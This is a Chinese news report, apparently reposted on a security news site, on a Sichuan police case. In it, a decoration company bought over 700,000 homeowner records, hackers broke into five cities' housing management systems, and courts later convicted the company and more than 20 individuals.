7月30日,成都商报-红星新闻记者从德昌警方获悉,截至今年7月1日,法院依法判决27人,还有多人被行政处罚,扣押、罚没涉案资金达200万元。目前,多家楼盘被行政处罚。针对所涉5市房管局,德昌警方已将相关线索通报5市网安部门。

装修公司花240万元

购买近千楼盘70余万条信息

2019年3月30日,德昌县公安局收到四川某装修公司在德昌县某酒店召开装修推介会的线索,参会客户在事前均未向该公司提供过任何个人信息及联系方式。德昌县警方发现该公司涉嫌非法持有公民个人信息,遂果断进行现场打击处理,并于当天直捣该公司总部。

据警方介绍,2015年成立的该装饰设计工程有限公司,为谋求公司快速发展,花费240余万元购买川、渝、黔3省份近千楼盘70余万条公民个人信息。警方通过调取自2015年年底至2019年年初犯罪嫌疑人的通话清单,掌握了该公司重要的犯罪证据。

2019年3月30日,警方在案发地四川德昌抓获该公司法定代表人陈某某等人,公司直接负责购买信息的犯罪嫌疑人苟某某被广州警方抓获。德昌警方通过缜密侦查,最终关联出30余名贩卖信息的“串串”及楼盘公司“内鬼”,迅速查出所有人员的真实身份信息,所有涉案人员全部归案。

警方抓获幕后黑客

5市房管局系统遭入侵

经对犯罪嫌疑人的落地查证,德昌县公安局“3·30侵犯公民个人信息专案组”抓获达州籍黑客杨某某、南充籍黑客马某某。查实4人利用工作之便和网络技能入侵四川5市房管系统,非法获取楼盘业主信息

经查,该装饰工程有限公司法定代表人陈某某及管理人员杨某某为招揽客户,高薪聘请专门从事购买公民信息的苟某某、郭某某开拓市场资源,发展业务,并授意财务主管王某负责与苟、郭二人具体对接操作,后又由王某将高价买回的业主信息分发给公司市场部进行电话营销。

德昌警方介绍,根据公安部统一部署,在四川省公安厅和凉山州公安局相关部门大力支持下,德昌县公安局网情大队在四川、重庆、贵州警方联动驰援下,破获公安部督办的“3·30侵犯公民个人信息、黑客专案”,成功侦破侵犯公民个人信息案件20件、非法获取计算机信息系统数据案4件,行政处罚多家涉案楼盘及其他相关公司,抓获犯罪嫌疑人36人,涉嫌侵犯的公民个人信息70余万条,涉案资金240余万元。

装修公司被判处罚金65万元

20多人被判刑

今年7月1日,德昌县人民法院依法作出判决:被告单位四川某装饰设计工程有限公司犯侵犯公民个人信息罪,判处罚金人民币65万元。

判决书显示,本案中有20多人被判刑。其中,2018年5月至2018年年底,马某某为非法获利,多次侵入四川某市房管局系统,非法获取购房业主姓名、电话号码等个人信息1万余条,获利1万余元。去年12月31日,德昌县人民法院判决,马某某犯侵犯公民个人信息罪,判处有期徒刑3年。马某某提起上诉,今年5月凉山州中级人民法院二审维持原判。

2018年到2019年3月,杨某某多次侵入四川5市的房管局计算机系统,非法获取系统内4万余条公民购买楼盘信息数据,非法获利1.2万余元。去年11月19日,德昌县人民法院判决,杨某某犯侵犯公民个人信息罪,判处有期徒刑3年。

2017年至2018年年初,丁某为非法获利,利用职务之便入侵四川某市房管局房管系统,非法获取购房业主姓名、电话号码等个人信息1万余条,获利38500元。去年12月6日,德昌县人民法院依法判决,丁某犯破坏计算机信息系统罪、犯侵犯公民个人信息罪,数罪并罚,决定执行有期徒刑6年。

原文始发于微信公众号(网络安全应急技术国家工程实验室):装修公司花240万买业主信息:牵扯出四川5市房管系统遭黑客入侵

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

登录

找回密码

注册